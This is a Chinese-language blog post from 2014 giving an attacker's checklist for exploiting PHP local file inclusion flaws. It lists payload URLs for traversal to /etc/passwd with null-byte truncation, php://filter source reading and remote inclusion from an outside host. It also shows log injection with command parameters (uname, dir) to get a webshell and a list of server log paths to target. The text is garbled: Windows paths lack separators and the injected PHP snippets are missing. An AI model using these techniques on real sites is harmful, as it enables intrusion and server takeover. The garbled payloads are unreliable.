LFI漏洞利用总结

Posted on 2014-11-18 In 安全漏洞

主要涉及到的函数 include(),require()、include_once(),require_once() magic_quotes_gpc()、allow_url_fopen()、allow_url_include()、move_uploaded_file() 、readfile() file()、and file_get_contents()、upload_tmp_dir()、post_max_size()、and max_input_time()等典型漏洞代码：黑盒判断方法：单纯的从URL判断的话，URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞。

本地包含漏洞的利用（这里先忽略截断问题）

1、包含同服务器中上传的jpg、txt、rar等文件，这个是最理想的情况了。
2、包含系统的各种日志，如apache日志，文件系统日志等其中apache当记录格式为combined，一般日志都会很大，基本无法包含成功。包含log是有自动化攻击程序的。其中鬼子的博客中有提到一个空格的问题。见《邪恶的空格-PHP本地文件包含漏洞的新突破口》解决空格问题其实把一句话base64加密后再写入就可以执行了。
3、包含/proc/self/environ . 这个环境变量有访问web的session信息和包含user-agent的参数。user-agent在客户端是可以修改的。参考：《Shell via LFI –proc/self/environ method//http://hi.baidu.com/root\_exp/blog/item /9c0571fc2d42664fd7887d7d.html》
4、包含由php程序本身生成的文件，缓存、模版等，开源的程序成功率大。
5、利用本地包含读取PHP敏感性文件，需要PHP5以上版本。如看到“config”的源码如下 index.php?pages=php://filter/read=convert.base64-encode/resource=config 特别的情况用到readfile() 函数不是包含执行，可以直接读源码。
6、利用phpinfo页面getshell。一般大组织的web群存在phpinfo的机会挺大的。 poc和介绍参考《利用phpinfo信息LFI临时文件》//http://www.2cto.com/Article/201202/119213.html
7、利用包含出错，或者包含有未初始化变量的PHP文件，只要变量未初始化就可能再次攻击具体见《include()本地文件包含漏洞随想》//http://www.2cto.com/Article/200809/29748.html
8、结合跨站使用 index.php?pages=http:// www.2cto.com /path/xss.php?xss=phpcode （要考虑域信任问题）
9、包含临时文件文件。这个方法很麻烦的。参考《POST method uploads》//http://www.php.net/manual/en/features.file-upload.post-method.php 解决临时文件删除方法：慢连接（注：前提是file_uploads = On，5.3.1中增加了max_file_uploadsphp.ini file_uploads = On，5.3.1中增加了max_file_uploads，默认最大一次上传20个） windows格式：win下最长4个随机字符( ‘a’-’z’, ‘A’-’Z’, ’0′-’9′）如：c:/windows/temp/php3e.tmp linux格式：6个随机字符( ‘a’-’z’, ‘A’-’Z’, ’0′-’9′）如：/tmp/phpUs7MxA 慢连接的两种上传代码参考：《PHP安全之LFI漏洞GetShell方法大阅兵》//www.2cto.com/Article/201106/94414.html
10、当前实在找不到写权限目录时候，注入到log中再寻找写权限目录。如注入到log. Linux: index.php?pages=/var/log/apache/logs/error_log%00&x=/&y=uname windows: index.php?pages=..apachelogserror.log%00&x=.&y=dir 具体参考《PHP本地文件包含(LFI)漏洞利用》http://www.2cto.com/Article/201202/119214.html
11、使用php wrapper例如php://input、php://filter、data://等包含文件在《PHP 5.2.0 and allow_url_include》//http://blog.php-security.org/archives/45-PHP-5.2.0- and-allow_url_include.html 其中文中提到的allow_url_fopen和allow_url_include只是保护了against URL handles标记为URL.这影响了http(s) and ftp(s)但是并没有影响php或date 这些url形式。
12、LFI判断目录是否存在和列目录，如 **index.php?pages=../../../../../../var/www/dossierexistant/../../../../../etc/passwd%00 **这个方法在TTYshell上是可以完全是可以判断的，但是在URL上有时候不可行。即使不存在dossierexistant也可以回显passwd内容。 index.php?pages=../../../../../../var/www/dossierexistant/../../../../../etc/passwd%00 **FreeBSD 《directory listing with PHP file functions》http://websec.wordpress.com/2009 …php-file-functions/ 列目录 **存在逻辑判断的时候，如不存在该目录就会返回header.php+File not found+footer.php 存在就会返回header.php+footer.php。这种逻辑很符合程序员的习惯。曾经用找到了一个目录很深的日志获得shell。
13、包含SESSION文件，php保存格式sess_SESSIONID 默认位置是/tmp/(PHP Sessions)、/var/lib/php/session/(PHP Sessions)、/var/lib/php5/(PHP Sessions) 和c:/windows/temp/(PHP Sessions)等文件中。
14、包含/proc/self/cmdline 或者/proc/self/fd/找到log文件（拥有者为root，默认情况要root才能访问）具体参考Local File Inclusion – 《Tricks of the Trade》http://labs.neohapsis.com/2008/0 …ricks-of-the-trade/ 还有其他提到包含/var/log/auth.log的，但是这个文件默认情况也是644.
15、包含maillog 通常位置/var/log/maillog 这个方法也很鸡肋，具体参考《local file inclusion tricks 》http://devels-playground.blogspo …clusion-tricks.html
16、包含固定的文件，非常鸡肋，为了完整性也提下。如，可用中间人攻击。关于截断（简单介绍下，谷歌下很多文章提到了）截断要考虑两个问题magic_quotes_gpc（）和PHP版本。 1、%00空字符截断，除了这个截断在php 5.3.4以下版本好用外，以下截断都是有条件的。 2、windows Linux文件名大于4096字符被截断 Windows: 文件名大于256字符被截断参考的文档很多就不一一列举了。这个文章希望能给大家遇到LFI的时候有点帮助。如果是在win上，提交：test.php?for=D:toolsreadme.txt%00，就可以了，跨目录跨盘符。这里要注意，对于过多的”..”，360会自动拦截，比较好的办法是使用ie或者ff。但是光是浏览文件是不够的，我们还需要webshell。可以使用log injection的方法。这也是我作这个记录的主要目的，这才是重点所在。这里，思想的核心是要将php代码注入到log中，比如，我们可以将：注入进去（浏览器的自动更改实在太烦人）。注：friddle2不会对针对本机的访问过滤，我就输入本机的地址：192.168.0.1。然后访问：test.php?for=/var/log/apache/logs/error_log%00&x=/&y=uname，这是针对linux。如果平台切换到win，可以访问：test.php?for=..apachelogserror.log%00&x=.y=dir，会显示当前目录文件。当然，我们也可以将日志记录到access.log里，但那样会更复杂一些，因为需要包含的文件会更大。参考文献还提到了：使用linux的/proc/self/fd进行注入的方法，我对linux不熟悉，所以也没有细看，以后需要的时候再了解吧。额外的发现： 360浏览器有个奇怪的特性，当访问 http://www.baidu.com/search/error.html%00../../../../../../tools后，会访问一下目录：D:Program files360setools 看看有没有这个文件夹，这里有问题吧？TDH D:Program files360se360se3http:apachelogserror.log%00&y=dir和http://192.168.0.1:88/test.php?for=......apachelogserror.log%00&y=dir，这两者之间的关系是怎么得来的？附录： 1、可能的log路径、 /etc/httpd/logs/access.log /etc/httpd/logs/access_log /etc/httpd/logs/error.log /etc/httpd/logs/error_log /opt/lampp/logs/access_log /opt/lampp/logs/error_log /usr/local/apache/log /usr/local/apache/logs /usr/local/apache/logs/access.log /usr/local/apache/logs/access_log /usr/local/apache/logs/error.log /usr/local/apache/logs/error_log /usr/local/etc/httpd/logs/access_log /usr/local/etc/httpd/logs/error_log /usr/local/www/logs/thttpd_log /var/apache/logs/access_log /var/apache/logs/error_log /var/log/apache/access.log /var/log/apache/error.log /var/log/apache-ssl/access.log /var/log/apache-ssl/error.log /var/log/httpd/access_log /var/log/httpd/error_log /var/log/httpsd/ssl.access_log /var/log/httpsd/ssl_log /var/log/thttpd_log /var/www/log/access_log /var/www/log/error_log /var/www/logs/access.log /var/www/logs/access_log /var/www/logs/error.log /var/www/logs/error_log C:apachelogsaccess.log C:apachelogserror.log C:Program FilesApache GroupApachelogsaccess.log C:Program FilesApache GroupApachelogserror.log C:program fileswampapache2logs C:wampapache2logs C:wamplogs C:xamppapachelogsaccess.log C:xamppapachelogserror.log 1.找到LFI本地包含的漏洞 2.想办法上传不管是通过bbs，FCKEDITOR或者其他任何方式 3.使用如下代码 gif89a0 4.如果没有写入权限可以直接写脚本进行执行命令操作等